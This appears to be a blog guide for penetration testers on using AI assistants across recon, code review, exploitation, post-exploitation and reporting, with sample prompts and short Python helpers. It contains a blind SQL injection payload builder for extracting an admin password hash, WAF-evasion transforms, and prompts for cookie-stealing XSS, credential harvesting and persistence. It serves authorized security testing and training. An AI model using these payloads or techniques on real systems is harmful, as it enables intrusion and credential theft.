Claude just found 500 zero-days in production software. Kali Linux now has a native AI integration. Every security vendor is slapping “AI-powered” on their marketing page.

And you’re sitting there thinking: okay, but where do I actually start?

This guide is for you — the practicing pentester who knows their craft, understands the methodology, but hasn’t figured out how to meaningfully integrate AI into real engagements. We’ll cover the full kill chain, with concrete prompts, real tools, and honest assessments of where AI helps versus where it still fails.

Junior and senior. Both perspectives covered.


First: The Right Mental Model

AI is not an autopilot. It’s not going to pop shells for you while you grab a coffee. At least not reliably — not yet.

What it actually is: a force multiplier for your existing expertise. Every phase of a pentest involves tasks that are either tedious, pattern-matching-heavy, or documentation-intensive. Those are the tasks AI handles well. The adversarial creativity, the “what does this weird behavior actually mean” judgment, the client-specific contextual reasoning — that’s still you.

Think of it like having a very fast, very well-read junior analyst who never gets tired and has read every CVE, write-up, and methodology doc ever published. You still have to direct the work. You still have to validate the output. But you cover significantly more ground.


Phase 1: Recon & Enumeration

Where AI helps most

Recon generates mountains of data. Nmap output, subdomain lists, certificate transparency logs, OSINT dumps. The bottleneck isn’t running the tools — it’s making sense of what they return.

For junior pentesters: AI helps you not miss things. It catches the obscure service running on a weird port, the subdomain naming pattern that suggests a staging environment, the version string that maps to an unpatched CVE. Experience tells seniors what to focus on. AI gives juniors that pattern recognition faster.

For senior pentesters: AI handles the first-pass triage so you can skip straight to the interesting stuff. Feed it your nmap output and let it prioritize before you even look.

Practical prompts that work

Nmap triage:

Analyze this nmap scan output. Identify:
1. Services with known CVEs from the past 12 months
2. Unusual port/service combinations suggesting custom applications
3. Version strings indicating end-of-life or unpatched software
4. Services commonly vulnerable to authentication bypass

Prioritize by exploitability, not CVSS score alone. Flag anything that looks non-standard.

[paste nmap output here]
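Raw nmap output eats context fast. A quick pre-pass that condenses `-oX` XML down to one line per open service keeps the prompt tight and the model focused on versions, not noise. A minimal sketch — the sample XML is hypothetical, trimmed to the fields that matter:

```python
import xml.etree.ElementTree as ET

# Hypothetical fragment of `nmap -sV -oX scan.xml` output, trimmed for the sketch.
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="8009">
        <state state="open"/>
        <service name="ajp13" product="Apache Jserv" version="1.3"/>
      </port>
      <port protocol="tcp" portid="8443">
        <state state="open"/>
        <service name="https-alt" product="Apache Tomcat" version="9.0.65"/>
      </port>
    </ports>
  </host>
</nmaprun>"""

def summarize(xml_text):
    """Condense nmap XML to one line per open port: ip, port, product, version."""
    root = ET.fromstring(xml_text)
    lines = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            product = svc.get("product", "?") if svc is not None else "?"
            version = svc.get("version", "?") if svc is not None else "?"
            lines.append(f"{addr} {port.get('portid')}/{port.get('protocol')} {product} {version}")
    return lines

print("\n".join(summarize(SAMPLE_XML)))
```

Paste the condensed list plus the prompt above and you get the same triage on a fraction of the tokens.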

Subdomain intelligence:

Analyze these subdomains. Identify:
1. Naming patterns suggesting dev, staging, or internal environments
2. Subdomains that appear forgotten or abandoned based on naming conventions
3. Technology hints (jenkins, gitlab, vault, jira, etc.)
4. Anything that breaks the naming pattern — could indicate acquisitions or shadow IT

[paste subdomain list here]
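The same categories the prompt asks for can be pre-flagged deterministically before the model ever sees the list, so AI time goes to the ambiguous cases. A rough sketch — the subdomain list and keyword sets are illustrative, not exhaustive:

```python
import re

# Hypothetical list standing in for amass/subfinder output.
SUBDOMAINS = [
    "www.example.com", "api.example.com", "api-staging.example.com",
    "dev.example.com", "jenkins.example.com", "vault.example.com",
    "legacy-portal.acme-corp.example.com",
]

ENV_HINTS = ("dev", "staging", "stage", "test", "uat", "qa", "internal")
TECH_HINTS = ("jenkins", "gitlab", "vault", "jira", "grafana", "kibana")

def triage(subdomains):
    findings = {"env": [], "tech": [], "odd": []}
    for sub in subdomains:
        # Tokenize the leftmost label: "api-staging" -> ["api", "staging"].
        tokens = re.split(r"[-_]", sub.split(".")[0].lower())
        if any(t in ENV_HINTS for t in tokens):
            findings["env"].append(sub)
        if any(t in TECH_HINTS for t in tokens):
            findings["tech"].append(sub)
        # Deeper-than-usual nesting often marks acquisitions or shadow IT.
        if sub.count(".") > 2:
            findings["odd"].append(sub)
    return findings
```

Feed the model the buckets plus whatever didn't match, and ask it to reason about only the leftovers.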

JavaScript analysis: When you’re doing web app testing, AI excels at parsing JS files for hidden endpoints, hardcoded credentials, and API keys — work that takes hours by hand.

Analyze this JavaScript file. Find:
1. API endpoints not referenced in the main application
2. Hardcoded credentials, tokens, or API keys
3. Internal hostnames or IP addresses
4. Debug or admin functionality that appears disabled but still present

[paste JS content here]
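For large bundles, a cheap regex pre-scan catches the obvious hits and shrinks what you need to paste. A minimal sketch — the JS fragment and patterns are illustrative (the AWS key is Amazon's documented example key), and regexes will never match everything an LLM can reason out:

```python
import re

# Hypothetical minified-JS fragment; real bundles are far larger.
JS = 'fetch("/api/v2/internal/users");var k="AKIAIOSFODNN7EXAMPLE";host="10.10.3.7";'

ENDPOINT_RE = re.compile(r'["\'](/api/[^"\']+)["\']')      # quoted /api/ paths
AWS_KEY_RE = re.compile(r'AKIA[0-9A-Z]{16}')               # AWS access key IDs
IPV4_RE = re.compile(r'\b(?:10|172|192)\.\d{1,3}\.\d{1,3}\.\d{1,3}\b')  # RFC1918-ish

def prescan(js):
    """First-pass grep before handing the file to an LLM for deeper reasoning."""
    return {
        "endpoints": ENDPOINT_RE.findall(js),
        "aws_keys": AWS_KEY_RE.findall(js),
        "internal_ips": IPV4_RE.findall(js),
    }
```

Run this first, then let the AI chew on the deobfuscated logic around whatever it flags.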

Real result: A practitioner recently fed minified JS from a financial app to Claude. It surfaced three internal API endpoints that manual review of the bundle had missed. One had an IDOR returning 50,000 user records.


Phase 2: Vulnerability Analysis & Code Review

This is where AI has the biggest proven impact in 2026 — and where Claude’s zero-day research demonstrated real capability.

Static code review

AI reads code the way a senior researcher does — not just looking for known patterns, but reasoning about logic. It looks at how previous bugs were fixed, identifies similar patterns nearby, and catches second-order issues that scanners miss.

Prompt for targeted code review:

Review this code for security vulnerabilities. Pay particular attention to:
1. SQL injection — including second-order and blind injection paths
2. Authentication/authorization bypass
3. Input validation gaps
4. Logic flaws in business-critical functions
5. Insecure deserialization

For each finding, explain the attack path and what a proof-of-concept would look like.

[paste code here]

For seniors reviewing findings: Don’t just ask “is this vulnerable.” Ask for the exploit chain.

I found what looks like a blind SQLi in this endpoint. Walk me through how you'd extract the admin password hash using time-based techniques, assuming MySQL and a 5-second threshold.

CVE and version analysis

This service banner says [Apache Tomcat 9.0.65]. What are the highest-impact unpatched CVEs for this version? Which ones are reliably exploitable without authentication? Are there any public PoCs?

Phase 3: Exploitation

This is where AI requires the most careful handling — and where the junior/senior divide matters most.

Junior: Use AI for technique research, not execution

If you’re still building your exploitation intuition, AI is excellent for explaining why something works, not just how to run it. Understanding the mechanics makes you a better pentester; copy-pasting exploits makes you a script kiddie with extra steps.

Learning-oriented prompts:

Explain how a time-based blind SQL injection works at the database query level. What's actually happening when the response delays? Why does the boolean logic matter?
I'm working on a buffer overflow in a 32-bit Linux binary with no ASLR. Walk me through the methodology step by step — what do I look for first?
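To make the time-based SQLi mechanics concrete: each request asks the database one yes/no question, and the delay itself is the "yes." A sketch of how the payloads are constructed — the table, column, and MySQL syntax here are a hypothetical example, not a drop-in exploit:

```python
DELAY = 5  # seconds; must clearly exceed normal response-time jitter

def char_probe(position, ascii_guess):
    """Payload asking one yes/no question: is character <position> of the
    admin hash greater than <ascii_guess>? A slow response means yes.
    MySQL syntax; SUBSTRING is 1-indexed."""
    return (
        "' AND IF(ASCII(SUBSTRING((SELECT password_hash FROM users "
        f"WHERE username='admin'),{position},1))>{ascii_guess},"
        f"SLEEP({DELAY}),0)-- -"
    )

# Binary search halves the printable-ASCII range on every timed request,
# so extracting one character costs ~7 requests instead of ~95 linear guesses.
print(char_probe(1, 79))
```

Seeing the boolean condition wrapped around SLEEP() is exactly the "why does the boolean logic matter" answer: the comparison operator is what turns a delay primitive into a data channel.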

Senior: Use AI for payload generation and WAF evasion

This is where experienced practitioners get the most leverage. Instead of cycling through PayloadsAllTheThings manually, describe your exact constraint and let AI generate targeted options.

WAF bypass:

I'm testing a WAF that's blocking standard SQL injection payloads. The endpoint appears to use MySQL. The WAF blocks: single quotes, UNION SELECT, and common function names like SLEEP(). 

Generate 10 bypass variations using encoding, case manipulation, and comment injection. Explain the evasion technique behind each one.
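You can also script the mechanical transforms yourself and save the AI for the creative ones. A minimal sketch of three classic evasions — comment injection, case toggling, URL encoding — against a hypothetical blocked keyword; whether any of them lands depends entirely on the WAF in front of you:

```python
import urllib.parse

BASE = "UNION SELECT"

def comment_split(s):
    # MySQL treats /**/ as whitespace, which defeats naive keyword matching.
    return "/**/".join(s.split(" "))

def case_toggle(s):
    # Defeats case-sensitive signatures; SQL keywords are case-insensitive.
    return "".join(c.lower() if i % 2 else c.upper() for i, c in enumerate(s))

def url_encode(s):
    # Works when the WAF inspects raw bytes but the backend decodes first.
    return urllib.parse.quote(s)

def variants(payload):
    """Apply each transform, plus one stacked combination."""
    out = [comment_split(payload), case_toggle(payload), url_encode(payload)]
    out.append(case_toggle(comment_split(payload)))
    return out
```

Generate the mechanical set in bulk, test what gets through, then hand the survivors' pattern to the AI and ask what the WAF is probably matching on.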

Custom payload generation:

I need an XSS payload that:
- Bypasses a CSP that allows 'unsafe-inline' but blocks external script sources
- Exfiltrates document.cookie to a webhook I control
- Works in Chrome 121+ (Chrome removed its built-in XSS Auditor back in version 78, so the CSP is the real obstacle)

Walk me through the options.

Phase 4: The Kali + Claude MCP Setup

This is the most significant practical development in AI-assisted pentesting right now. Kali Linux has introduced native support for Claude via the Model Context Protocol (MCP) — a standard that lets AI models interact directly with tools and environments.

What it actually enables

Instead of: run scan → copy output → paste to Claude → read response → go back to terminal

You get: conversational interface directly to your Kali tools. Tell Claude to run nmap, analyze the output, then run the next logical tool — all in one session.

"Run nmap on ports 80 and 443, check for common web vulnerabilities, then give me a prioritized list of what to look at first."

Claude executes the commands, reads the output, and reasons about what it means — in context, as a chain.

How to set it up

  1. Install Claude Desktop (desktop app, not browser)
  2. Set up the Kali MCP server: pip install kali-mcp (open source, sandboxed)
  3. Connect Claude Desktop to the MCP server via the settings
  4. Run your Kali instance (local VM, cloud, or your existing setup)
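For step 3, Claude Desktop reads MCP servers from its `claude_desktop_config.json` under the documented `mcpServers` key. A sketch of what the entry might look like — the server name and `kali-mcp` command here are assumptions based on the pip package above; check the package's own docs for its actual entrypoint and options:

```json
{
  "mcpServers": {
    "kali": {
      "command": "kali-mcp",
      "args": []
    }
  }
}
```

Restart Claude Desktop after editing the file; the server should appear in the tools list.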

The MCP server provides a sandboxed bridge — Claude can run tools but is scoped to what you expose. You maintain control of what the AI can and can’t touch.

Note: This setup is most powerful in a lab or authorized engagement environment. The sandboxing is solid but you should still understand what you’re giving the AI access to.


Phase 5: Post-Exploitation & Lateral Movement

AI’s role in post-exploitation is mostly research and planning. Given the context-sensitivity of live exploitation, autonomous AI action here carries more risk of disruption.

Where it adds value

Living off the land technique lookup:

I have a foothold on a Windows 10 machine as a standard user. No internet access from the target. What are the best LOLBins for:
1. Credential harvesting without dropping Mimikatz
2. Lateral movement using only built-in Windows tools
3. Persistence that survives reboots without registry writes

Active Directory enumeration:

I've run BloodHound and have the JSON output. Analyze this for:
1. The shortest path to Domain Admin
2. Any Kerberoastable accounts with admin rights
3. ACL abuse paths I should prioritize
4. Quick wins that don't require elevated privileges

[paste BloodHound JSON or summary]
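Worth understanding what "shortest path to Domain Admin" actually means under the hood: BloodHound models abusable relationships as graph edges and runs shortest-path queries over them. A toy sketch with a breadth-first search — the node and edge names below are illustrative, not real BloodHound schema:

```python
from collections import deque

# Toy attack graph: each edge is an abusable relationship.
EDGES = {
    "USER:alice": [("GenericWrite", "GROUP:helpdesk")],
    "GROUP:helpdesk": [("AdminTo", "COMPUTER:srv01")],
    "COMPUTER:srv01": [("HasSession", "USER:da_svc")],
    "USER:da_svc": [("MemberOf", "GROUP:domain_admins")],
}

def shortest_path(start, target):
    """BFS finds the fewest-hop chain, which is what you triage first."""
    queue = deque([(start, [start])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for edge, nxt in EDGES.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, path + [f"-{edge}->", nxt]))
    return None

print(shortest_path("USER:alice", "GROUP:domain_admins"))
```

Knowing the graph model helps you sanity-check the AI's answer: every hop it proposes should correspond to a concrete abuse primitive you can actually execute.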

Privilege escalation:

I'm on a Linux box as www-data. Here's the output of: id, sudo -l, find / -perm -4000 2>/dev/null, and crontab -l. What are my best privesc paths?

[paste output]

Phase 6: Reporting

This is the unglamorous part of pentesting that AI handles exceptionally well. Report writing is pattern-heavy, time-consuming, and rarely your favorite part of an engagement.

Finding write-up generation:

Write a professional pentest finding for the following vulnerability:

Type: Blind SQL Injection
Location: /api/v2/members/events endpoint
Parameter: filter[created_at]
Impact: Authenticated users can execute arbitrary SQL against the production database
Evidence: [describe what you observed]
Affected system: [client system]

Write it in the format: Description, Risk Rating, Evidence, Remediation. Use clear technical language suitable for a technical audience. Include a CVSS score where applicable.
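If you do this a lot, keep the template in code so the AI only drafts the prose fields and the structure stays consistent across findings. A minimal sketch — the finding content below is hypothetical filler standing in for your real evidence:

```python
# Hypothetical finding; in practice the prose fields come from your notes
# plus an AI first draft, then your review.
FINDING = {
    "title": "Blind SQL Injection in /api/v2/members/events",
    "risk": "High",
    "description": "The filter[created_at] parameter is concatenated into a SQL query.",
    "evidence": "A 5-second conditional delay was observed on injected IF/SLEEP payloads.",
    "remediation": "Use parameterized queries for all filter parameters.",
}

TEMPLATE = """## {title}

**Risk Rating:** {risk}

**Description**
{description}

**Evidence**
{evidence}

**Remediation**
{remediation}
"""

def render(finding):
    """Fill the report scaffold; missing keys raise a KeyError early."""
    return TEMPLATE.format(**finding)
```

One dict per finding, one render call, and the deliverable formatting never drifts between engagements.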

Executive summary:

I've completed a penetration test with the following findings: [list findings, severities, brief descriptions]. Write an executive summary for a non-technical C-suite audience. Focus on business risk, not technical details. Keep it under 400 words.

Senior note: AI-generated findings still need your review. It’s fast, but you’re responsible for the accuracy. Check every claim before it goes in a deliverable.


The Honest Limits

AI is not good at:

  • Real-time exploitation — it can’t adapt to live target behavior in a loop the way a skilled human can. Not yet.
  • Novel, creative attack chains — it knows what’s documented. The truly novel paths still come from human intuition.
  • Understanding client context — it doesn’t know that this particular application is a legacy system that can’t be patched, or that this user account belongs to the CEO. You have to carry that context.
  • Reliable exploit execution — it generates payloads well. It doesn’t reliably debug why your shellcode isn’t executing in a real environment.
  • Keeping up with cutting-edge research — if the technique was published last week, the model probably doesn’t know it yet.

Where to Start Tomorrow

If you’re a junior pentester:

  1. Start with recon triage. Paste your next nmap output into Claude and compare its analysis to what you would have focused on manually. Learn from the gaps.
  2. Use it for learning, not shortcuts. Ask it to explain every technique it suggests. Build the foundation.
  3. Try the Kali MCP setup in your home lab. It fundamentally changes how you interact with your tooling.

If you’re a senior pentester:

  1. Integrate AI into your JS analysis and code review phase. This is where the ROI is highest immediately.
  2. Use it to generate and iterate payload variants. Stop manually cycling through payload lists.
  3. Offload report writing. Use AI for first drafts, you for review and accuracy. Cut your report time in half.

The Bottom Line

Claude finding 500 zero-days isn’t a story about AI replacing pentesters. It’s a signal that the practitioners who integrate these tools into their workflow will cover significantly more ground than those who don’t.

The methodology is still yours. The judgment is still yours. The client relationship is still yours.

But the grunt work? The triage, the pattern-matching, the payload iteration, the report drafting? You don’t have to do all of that manually anymore.

Start small. One phase at a time. The compounding effect is real.


Want more guides like this? Follow @RedTeamGuides on X for daily practitioner takes on offensive security.